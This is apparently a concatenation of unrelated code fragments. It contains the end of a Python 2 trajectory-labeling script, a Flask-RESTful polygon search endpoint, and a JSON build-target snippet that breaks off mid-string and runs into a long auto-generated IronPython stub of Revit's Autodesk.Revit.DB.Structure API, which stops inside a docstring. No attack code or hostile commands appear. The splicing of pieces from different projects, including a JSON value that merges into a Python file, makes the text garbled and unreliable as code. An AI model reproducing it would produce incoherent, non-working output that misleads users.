trajectory_file: pickle.dump(camera_view_trajectory, trajectory_file) vl.close_video() raw_input('\nPress enter to continue...\n') print 'End of labeling' from flask import request from flask_restful import Resource from db.db_handler import perform_select from query_builder.query_builder_factory import QueryBuilderFactory from response_builder.response_factory import ResponseFactory class SearchPolygon(Resource): def get(self): path = request.args.get('path') date = request.args.get('date') param_id = request.args.get("param_id") mars_class = request.args.get("mars_class") mars_type = request.args.get("mars_type") start_date = request.args.get("start_date") end_date = request.args.get("end_date") limit = request.args.get("limit") page = request.args.get("page") sort = request.args.get("sort") query, value = QueryBuilderFactory.get_type('polygon').build(dict( path=path, date=date, param_id=param_id, mars_class=mars_class, mars_type=mars_type, start_date=start_date, end_date=end_date, limit=limit, page=page, sort=sort )) result = perform_select(query, value) response_type = request.args.get("response_type") response_builder = ResponseFactory.get_type(response_type) response = response_builder.build(result) return response { "targets": [ { "target_name": "nodelua", "variables": { "lua_include": "release/stubs/Autodesk/Revit/DB/Structure/__init__.py # encoding: utf-8 # module Autodesk.Revit.DB.Structure calls itself Structure # from RevitAPI, Version=17.0.0.0, Culture=neutral, PublicKeyToken=null # by generator 1.145 # no doc # no imports # no functions # classes class AnalyticalAlignmentMethod(Enum, IComparable, IFormattable, IConvertible): """ Specifies how analytical model is being aligned in space enum AnalyticalAlignmentMethod, values: AutoDetect (0), ManuallyAdjusted (2), Projection (1), Varies (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass AutoDetect = None ManuallyAdjusted = None Projection = None value__ = None Varies = None class AnalyticalConsistencyChecking(object): """ Utilities that allow for detection of incorrect or incomplete analytical consistency. """ @staticmethod def CheckAnalyticalConsistency(document): """ CheckAnalyticalConsistency(document: Document) -> bool Checks consistency of the Analytical Model. document: Document in which to perform consistency checks. Returns: True if run succeeded, false otherwise. """ pass __all__ = [ 'CheckAnalyticalConsistency', ] class AnalyticalCurveSelector(Enum, IComparable, IFormattable, IConvertible): """ Specifies which portion of an Analytical Curve is of interest. 
enum AnalyticalCurveSelector, values: EndPoint (1), StartPoint (0), WholeCurve (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass EndPoint = None StartPoint = None value__ = None WholeCurve = None class AnalyticalCurveType(Enum, IComparable, IFormattable, IConvertible): """ Identifies what type of Analytical Model curves should be extracted. enum AnalyticalCurveType, values: ActiveCurves (3), AllRigidLinks (6), ApproximatedCurves (4), BaseCurve (5), RawCurves (0), RigidLinkHead (1), RigidLinkTail (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass ActiveCurves = None AllRigidLinks = None ApproximatedCurves = None BaseCurve = None RawCurves = None RigidLinkHead = None RigidLinkTail = None value__ = None class AnalyticalDirection(Enum, IComparable, IFormattable, IConvertible): """ Specifies a direction for manipulating analytical model. enum AnalyticalDirection, values: Any (6), Horizontal (3), HorizontalEnd (5), HorizontalStart (4), Vertical (0), VerticalBottom (2), VerticalTop (1), X (7), Y (8), Z (9) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Any = None Horizontal = None HorizontalEnd = None HorizontalStart = None value__ = None Vertical = None VerticalBottom = None VerticalTop = None X = None Y = None Z = None class AnalyticalElementSelector(Enum, IComparable, IFormattable, IConvertible): """ Specifies a portion of an Analytical Element or the whole element. enum AnalyticalElementSelector, values: EndOrTop (1), StartOrBase (0), Whole (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass EndOrTop = None StartOrBase = None value__ = None Whole = None class AnalyticalFixityState(Enum, IComparable, IFormattable, IConvertible): """ Specifies the fixity setting of individual degrees of freedom in analytical release conditions. enum AnalyticalFixityState, values: Fixed (0), Released (1), Spring (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Fixed = None Released = None Spring = None value__ = None class AnalyticalLink(Element, IDisposable): """ An analytical link element that is used to create connections between other AnalyticalModel elements. """ @staticmethod def Create(doc, type, startHubId, endHubId): """ Create(doc: Document, type: ElementId, startHubId: ElementId, endHubId: ElementId) -> AnalyticalLink Creates a new instance of a AnalyticalLink element between two Hubs. doc: Document to which new AnalyticalLink should be added. type: AnalyticalLinkType for the new AnalyticalLink. startHubId: Hub at start of AnalyticalLink. endHubId: Hub at end of AnalyticalLink. 
Returns: The newly created AnalyticalLink instance. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def IsAutoGenerated(self): """ IsAutoGenerated(self: AnalyticalLink) -> bool Specifies whether or not an AnalyticalLink was created by an AnalyticalModel element. Returns: True if AnalyticalLink was created by an AnalyticalModel element, false otherwise. """ pass @staticmethod def IsValidHub(doc, hubId): """ IsValidHub(doc: Document, hubId: ElementId) -> bool Checks whether input hub is valid for an AnalyticalLink. doc: Hubs's document. hubId: Hub to test for validity. Returns: True is returned when provided hubId points hub that is valid for AnalyticalLink, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass End = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The point at the end of the AnalyticalLink. Get: End(self: AnalyticalLink) -> XYZ """ EndHubId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Hub ID at end of AnalyticalLink. Get: EndHubId(self: AnalyticalLink) -> ElementId """ OwnerId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """ElementId of AnalyticalModel element which created the AnalyticalLink (if any) invalidElementId if this Analytical Link was created by the User or API Get: OwnerId(self: AnalyticalLink) -> ElementId """ Start = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The point at the start of the AnalyticalLink. Get: Start(self: AnalyticalLink) -> XYZ """ StartHubId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Hub ID at start of AnalyticalLink. Get: StartHubId(self: AnalyticalLink) -> ElementId """ class AnalyticalLinkType(ElementType, IDisposable): """ An object that specifies the analysis properties for an AnalyticalLink element. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass @staticmethod def IsValidAnalyticalFixityState(fixityState): """ IsValidAnalyticalFixityState(fixityState: AnalyticalFixityState) -> bool Returns whether the input fixity state is valid for Analytical Link Type parameters. fixityState: The fixity state value to check. Returns: True if valid. 
""" pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass RotationX = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Fixity of rotation around X. Get: RotationX(self: AnalyticalLinkType) -> AnalyticalFixityState Set: RotationX(self: AnalyticalLinkType) = value """ RotationY = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Fixity of rotation around Y. Get: RotationY(self: AnalyticalLinkType) -> AnalyticalFixityState Set: RotationY(self: AnalyticalLinkType) = value """ RotationZ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Fixity of rotation around Z. Get: RotationZ(self: AnalyticalLinkType) -> AnalyticalFixityState Set: RotationZ(self: AnalyticalLinkType) = value """ TranslationX = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Fixity of translation along X. Get: TranslationX(self: AnalyticalLinkType) -> AnalyticalFixityState Set: TranslationX(self: AnalyticalLinkType) = value """ TranslationY = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Fixity of translation along Y. Get: TranslationY(self: AnalyticalLinkType) -> AnalyticalFixityState Set: TranslationY(self: AnalyticalLinkType) = value """ TranslationZ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Fixity of translation along Z. Get: TranslationZ(self: AnalyticalLinkType) -> AnalyticalFixityState Set: TranslationZ(self: AnalyticalLinkType) = value """ class AnalyticalLoopType(Enum, IComparable, IFormattable, IConvertible): """ Specifies kind of analytical model loop. enum AnalyticalLoopType, values: All (0), External (1), Filled (3), Internal (2), Void (4) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass All = None External = None Filled = None Internal = None value__ = None Void = None class AnalyticalModel(Element, IDisposable): """ AnalyticalModel represents the Analytical Model portion of a given Structural Element. """ def Approximate(self, enableApproximation): """ Approximate(self: AnalyticalModel, enableApproximation: bool) Switches between non-approximated (e.g., Curved) Analytical Models and approximated (made up of lines only) Analytical Models enableApproximation: Enable/disable approximated function. """ pass def CanApproximate(self): """ CanApproximate(self: AnalyticalModel) -> bool Indicates if Analytical Model can be approximated or not. Returns: True if Analytical Model can be approximated; false otherwise. """ pass def CanDisableAutoDetect(self, direction): """ CanDisableAutoDetect(self: AnalyticalModel, direction: AnalyticalDirection) -> bool Indicates if Analytical Auto-detect can be disabled programmatically direction: Direction in which to test whether Analytical Auto-detect can be disabled Returns: True if Analytical Auto-detect can be disabled, false otherwise """ pass def CanHaveRigidLinks(self): """ CanHaveRigidLinks(self: AnalyticalModel) -> bool Indicates if Analytical Model supports Rigid Links. Returns: True if Analytical Model supports Rigid Links; false otherwise. """ pass def CanUseHardPoints(self): """ CanUseHardPoints(self: AnalyticalModel) -> bool Indicates if Analytical Model can use Hard Points. Returns: True if Analytical Model can use Hard Points, false otherwise. """ pass def CloneAdjustment(self, source, end): """ CloneAdjustment(self: AnalyticalModel, source: AnalyticalModel, end: int) The method clones the adjustment of one end of the AM on another AM, with respect to the one of the ends. One of the Analytical Model ends """ pass def Disconnect(self, selector): """ Disconnect(self: AnalyticalModel, selector: AnalyticalElementSelector) Unjoin from Hub Element. selector: End of the analytical model. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def Enable(self, enable): """ Enable(self: AnalyticalModel, enable: bool) Enables or disables Analytical Model, if the Element allows a one-operation Analytical Model toggle. enable: Enable (true) or disable (false) Analytical Model. """ pass def EnableAutoDetect(self, direction, enabled): """ EnableAutoDetect(self: AnalyticalModel, direction: AnalyticalDirection, enabled: bool) Enable or disable Analytical Auto-detect. direction: Direction in which to enable Analytical Auto-detect enabled: Turn Analytical Auto-detect on (true) or off (false) """ pass def GetAnalyticalModelSketchComponents(self): """ GetAnalyticalModelSketchComponents(self: AnalyticalModel) -> IList[AnalyticalModelSketchComponent] Retrieves a collection of AnalyticalModelSketchComponent objects, which are useful for those Analytical Models that have finer calibration below the Element level. Returns: If the Analytical Model supports Sketch-based adjustment of the Analytical Model, then this will return an array of AnalyticalModelSketchComponents. Otherwise, it will return an empty array. 
""" pass def GetAnalyticalModelSupports(self): """ GetAnalyticalModelSupports(self: AnalyticalModel) -> IList[AnalyticalModelSupport] Retrieves the AnalyticalModelSupport array, which is useful to extract Analytical Support Information from Elements. Returns: Array of AnalyticalModelSupport objects, each one representing a support. """ pass def GetAnalyzeAs(self): """ GetAnalyzeAs(self: AnalyticalModel) -> AnalyzeAs Returns value of Analyze As parameter for Analytical Model. Returns: AnalyzeAs enumeration, indicating how Analytical Model is analyzed. """ pass def GetApproximationDeviation(self): """ GetApproximationDeviation(self: AnalyticalModel) -> float Retrieves amount by which approximation is made. Returns: Maximum distance from approximated line to curve. If approximation does not make sense, then this will be 0.0. """ pass def GetAutoDetectMatchedElements(self, direction): """ GetAutoDetectMatchedElements(self: AnalyticalModel, direction: AnalyticalDirection) -> ICollection[ElementId] Retrieves other Element Ids that this Element is Auto-detecting against. direction: Direction in which Analytical Auto-detect is being done. Returns: A set of Element Ids against which this Element is Auto-detecting. The set may be empty if this Element is not Auto-detecting against anything. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCurve(self): """ GetCurve(self: AnalyticalModel) -> Curve Returns the single curve of the Analytical Model, if it is only one curve. Returns: Single curve of the Analytical Model. """ pass def GetCurves(self, curveType): """ GetCurves(self: AnalyticalModel, curveType: AnalyticalCurveType) -> IList[Curve] Retrieves all curves for the Analytical Model of a given type. curveType: Which curve type should be returned. Returns: An array of curves representing analytical model. """ pass def GetElementId(self): """ GetElementId(self: AnalyticalModel) -> ElementId Retrieves Element Id of the structural element corresponding to the Analytical Model. Returns: Element Id for a structural element. """ pass def GetLocalCoordinateSystem(self): """ GetLocalCoordinateSystem(self: AnalyticalModel) -> Transform Gets the local coordinate system (LCS) for an analytical model element. Returns: Transformation matrix. Returns ll for analytical model elements that do not have local coordinate system. Origin returned by transform is point for which local coordinate system was calculated. """ pass def GetManualAdjustmentMatchedElements(self): """ GetManualAdjustmentMatchedElements(self: AnalyticalModel) -> ICollection[ElementId] Retrieves other Element Ids against which the Analytical Model has been adjusted. Returns: Set of Element Ids, representing those Elements against which the Analytical Model has been adjusted. The set may be empty if Analytical Model is not participating in locked Manual Analytical Adjustment. """ pass def GetOffset(self, selector): """ GetOffset(self: AnalyticalModel, selector: AnalyticalElementSelector) -> XYZ Gets the offset of the analytical model at end. selector: End of the analytical model. Returns: Offset of analytical model from base analytical model at the given end. """ pass def GetPoint(self): """ GetPoint(self: AnalyticalModel) -> XYZ Retrieves point of the Analytical Model. Returns: Point of the Analytical Model. 
""" pass def GetReference(self, selector): """ GetReference(self: AnalyticalModel, selector: AnalyticalModelSelector) -> Reference Returns a reference to a given curve within the analytical model. selector: Specifies where in the analytical model the reference lies. Returns: Requested reference. """ pass def GetRigidLink(self, selector): """ GetRigidLink(self: AnalyticalModel, selector: AnalyticalModelSelector) -> Curve Returns rigid link curve corresponding to selector. selector: Identifies from which end of the analytical model to get the Rigid Link. Returns: Rigid link satisfying selector. """ pass def HasDeletedLinks(self): """ HasDeletedLinks(self: AnalyticalModel) -> bool Indicates if Analytical Model contains deleted Analytical Links. Returns: True if contains, false otherwise. """ pass def HasRigidLinksWith(self, neighborId): """ HasRigidLinksWith(self: AnalyticalModel, neighborId: ElementId) -> bool Indicates if Analytical Model has Rigid Links with specified element. neighborId: neighboring Element, to which Rigid Links may exist. Returns: true if Rigid Links exist, false otherwise. """ pass def IsAnalyzeAsValid(self, analyzeAs): """ IsAnalyzeAsValid(self: AnalyticalModel, analyzeAs: AnalyzeAs) -> bool Determines if the given Analyze As parameter is valid for this Element. analyzeAs: Indicates how Analytical Model is analyzed. Returns: True if valid; false otherwise. """ pass def IsApproximated(self): """ IsApproximated(self: AnalyticalModel) -> bool Indicates if Analytical Model is approximated or not. Returns: True if the Analytical Model is approximated, false otherwise. False if approximation is meaningless for Analytical Model. """ pass def IsAutoDetectEnabled(self, direction): """ IsAutoDetectEnabled(self: AnalyticalModel, direction: AnalyticalDirection) -> bool Reports if Analytical Auto-detect for the given direction is enabled. direction: Direction in which Auto-detect behavior may be enabled. Returns: True if enabled in the given direction, false otherwise. """ pass def IsElementFullySupported(self): """ IsElementFullySupported(self: AnalyticalModel) -> bool Indicates if Analytical Model is fully supported. Returns: True if Analytical Model is fully supported, false otherwise. """ pass def IsEnabled(self): """ IsEnabled(self: AnalyticalModel) -> bool Reports whether the Analytical Model is enabled or disabled. Returns: True if Analytical Model is enabled, false otherwise. """ pass def IsManuallyAdjusted(self): """ IsManuallyAdjusted(self: AnalyticalModel) -> bool Indicates if the Analytical Model has been manually adjusted by the user. Returns: True if user has manually adjusted the Analytical Model; false otherwise. """ pass def IsModified(self): """ IsModified(self: AnalyticalModel) -> bool Checks if AM has been adjusted from auto-detect at any end. """ pass def IsSingleCurve(self): """ IsSingleCurve(self: AnalyticalModel) -> bool Indicates if the Analytical Model can be expressed as a single curve. Returns: True if Analytical Model can be expressed as a single curve, false otherwise. """ pass def IsSinglePoint(self): """ IsSinglePoint(self: AnalyticalModel) -> bool Indicates if the Analytical Model can be expressed as a single point. Returns: True if Analytical Model can be expressed as a single point, false otherwise. """ pass def IsValidDirectionForAutoDetect(self, direction): """ IsValidDirectionForAutoDetect(self: AnalyticalModel, direction: AnalyticalDirection) -> bool Tests if the supplied direction is valid for Analytical Auto-detect. 
direction: Direction in which Auto-detect behavior may be valid. Returns: True if direction is valid, false otherwise. """ pass def IsValidForManualAdjustment(self, reference): """ IsValidForManualAdjustment(self: AnalyticalModel, reference: Reference) -> bool Indicates if the identified reference is acceptable for Manual Analytical Adjustment. reference: Reference that will be examined. Returns: True if reference can be used, false otherwise. """ pass def IsValidManualAdjustmentSource(self, source, adjustmentDirection): """ IsValidManualAdjustmentSource(self: AnalyticalModel, source: Reference, adjustmentDirection: AnalyticalDirection) -> bool Indicates if the identified reference is acceptable as a source for Manual Analytical Adjustment. source: Reference to be examined. adjustmentDirection: Direction in which adjustment will occur. Returns: True if reference can be used as source; false otherwise. """ pass def IsValidManualAdjustmentTarget(self, target, source, direction): """ IsValidManualAdjustmentTarget(self: AnalyticalModel, target: Reference, source: Reference, direction: AnalyticalDirection) -> bool Indicates if reference is acceptable as a "Target" for Manual Analytical Adjustment. target: Target reference. source: Source reference. This is necessary to avoid illegal conditions. For instance if Element A is manually adjusted against Element B, Element B cannot in general be adjusted against Element A. direction: Direction in which source Element can be adjusted against target Element. Returns: True if reference can be used, false otherwise. """ pass def IsValidRigidLinksOption(self, rigidLinksOption): """ IsValidRigidLinksOption(self: AnalyticalModel, rigidLinksOption: AnalyticalRigidLinksOption) -> bool Indicates if Rigid Links option is valid for the Analytical Model. rigidLinksOption: Rigid Links option to validate. Returns: True if option is valid, false otherwise. """ pass def IsValidSelector(self, selector): """ IsValidSelector(self: AnalyticalModel, selector: AnalyticalModelSelector) -> bool Indicates if the input selector is valid for the Analytical Model. selector: Portion of the analytical model geometry. Returns: True if selector is valid for this Analytical Model, false otherwise. """ pass def ManuallyAdjust(self, source, target): """ ManuallyAdjust(self: AnalyticalModel, source: Reference, target: Reference) -> bool Perform Manual Analytical Adjustment on analytical model, with respect to another Element source: Which part of Analytical Model needs to change. target: Which part of another Analytical Model change should be made against. Returns: Indicates the successful completion of the Manual Analytical Adjustment operation. True if source Element was adjusted successfully, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def ResetLinks(self): """ ResetLinks(self: AnalyticalModel) The function is trying to recreate analytical link elements that were deleted by the user. """ pass def ResetManualAdjustment(self): """ ResetManualAdjustment(self: AnalyticalModel) -> bool Resets all manual adjustments performed by the user onto the Analytical Model. Returns: Indicates the successful reset of all manual adjustment. True if reset succeeds, false otherwise. """ pass def SetAnalyzeAs(self, analyzeAs): """ SetAnalyzeAs(self: AnalyticalModel, analyzeAs: AnalyzeAs) Sets value of Analyze As parameter for this Element. 
analyzeAs: Indicates how Analytical Model is analyzed . """ pass def SetApproximationDeviation(self, deviation): """ SetApproximationDeviation(self: AnalyticalModel, deviation: float) Adjusts the amount by which approximation is made. deviation: Maximum distance from line to actual curve """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetOffset(self, selector, offset): """ SetOffset(self: AnalyticalModel, selector: AnalyticalElementSelector, offset: XYZ) Sets the offset of the analytical model at end. selector: End of analytical model to offset. offset: New offset for end of analytical model. """ pass def SetUsesHardPoints(self, hardPoints): """ SetUsesHardPoints(self: AnalyticalModel, hardPoints: bool) Sets Hard Points for the Analytical Model. hardPoints: Enable/disable Hard Points (true = enable). """ pass def SupportsManualAdjustment(self): """ SupportsManualAdjustment(self: AnalyticalModel) -> bool Indicates if the Element supports Manual Analytical Adjustment. Returns: True if Manual Adjustment is possible, false otherwise. """ pass def UsesHardPoints(self): """ UsesHardPoints(self: AnalyticalModel) -> bool Indicates if the Analytical Model is using Hard Points during approximation. Returns: True if Hard Points are being used, false otherwise. False if Hard Points are meaningless for Analytical Model. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass RigidLinksOption = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if parameters indicate if Rigid Links should be formed. Get: RigidLinksOption(self: AnalyticalModel) -> AnalyticalRigidLinksOption Set: RigidLinksOption(self: AnalyticalModel) = value """ class AnalyticalModelStick(AnalyticalModel, IDisposable): """ An element that represents a stick in the structural analytical model. Could be one of beam, brace or column type. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetAlignmentMethod(self, selector): """ GetAlignmentMethod(self: AnalyticalModelStick, selector: AnalyticalElementSelector) -> AnalyticalAlignmentMethod Gets the alignment method for a given selector. selector: End of the analytical model. Returns: The alignment method at a given end. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetLocalCoordinateSystem(self, *__args): """ GetLocalCoordinateSystem(self: AnalyticalModelStick, point: XYZ) -> Transform Gets the local coordinate system (LCS) reflects analytical model orientation at the specified point. point: The point on the analytical model stick element. Returns: Transformation matrix. x - longitudinal axis, y - transversal, section - horizontal, strong axis, z - transversal, section - vertical, weak axis, origin - base point of LCS. 
GetLocalCoordinateSystem(self: AnalyticalModelStick, parameter: float) -> Transform Gets the local coordinate system (LCS) reflects analytical model orientation at the specified parameter value along a curve. parameter: The parameter value along a curve that should be in the range [0, 1], where 0 represents start and 1 represents end of the element. Returns: Transformation matrix. x - longitudinal axis, y - transversal, section - horizontal, strong axis, z - transversal, section - vertical, weak axis, origin - base point of LCS. """ pass def GetMemberForces(self): """ GetMemberForces(self: AnalyticalModelStick) -> IList[MemberForces] Gets the member forces associated with this element. Returns: Returns a collection of Member Forces associated with this element. Empty collection will be returned if element doesn't have any Member Forces. To find out with which end member forces are associated use Autodesk::Revit::DB::Structure::MemberForces::Position property to obtain a position of Member Forces on element. """ pass def GetProjectionPlaneY(self, selector): """ GetProjectionPlaneY(self: AnalyticalModelStick, selector: AnalyticalElementSelector) -> ElementId Retrieves analytical model projection information for Y direction. selector: End of the analytical model. Returns: Plane on to which analytical model is projected, or invalidElementId if not projected to a Plane. """ pass def GetProjectionPlaneZ(self, selector): """ GetProjectionPlaneZ(self: AnalyticalModelStick, selector: AnalyticalElementSelector) -> ElementId Retrieves analytical model projection information for Z direction. selector: End of the analytical model. Returns: Plane on to which analytical model is projected, or invalidElementId if not projected to a Plane. """ pass def GetProjectionY(self, selector): """ GetProjectionY(self: AnalyticalModelStick, selector: AnalyticalElementSelector) -> StickElementProjectionY Retrieves analytical model projection information for Y direction. selector: End of the analytical model. Returns: Indicates if the projection is a preset value, or refers to a Plane. """ pass def GetProjectionZ(self, selector): """ GetProjectionZ(self: AnalyticalModelStick, selector: AnalyticalElementSelector) -> StickElementProjectionZ Retrieves analytical model projection information for Z direction. selector: End of the analytical model. Returns: Indicates if the projection is a preset value, or refers to a Plane. """ pass def GetReleases(self, start, fx, fy, fz, mx, my, mz): """ GetReleases(self: AnalyticalModelStick, start: bool) -> (bool, bool, bool, bool, bool, bool) Gets the releases of element. start: The position on analytical model stick element. True for start, false for end. """ pass def GetReleaseType(self, start): """ GetReleaseType(self: AnalyticalModelStick, start: bool) -> ReleaseType Gets the release type. start: The position on analytical model stick element. True for start, false for end. Returns: The type of release. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def RemoveAllMemberForces(self): """ RemoveAllMemberForces(self: AnalyticalModelStick) -> bool Removes all member forces associated with element. Returns: True if any member forces were removed, false otherwise. """ pass def RemoveMemberForces(self, start): """ RemoveMemberForces(self: AnalyticalModelStick, start: bool) -> bool Removes member forces defined for given position. 
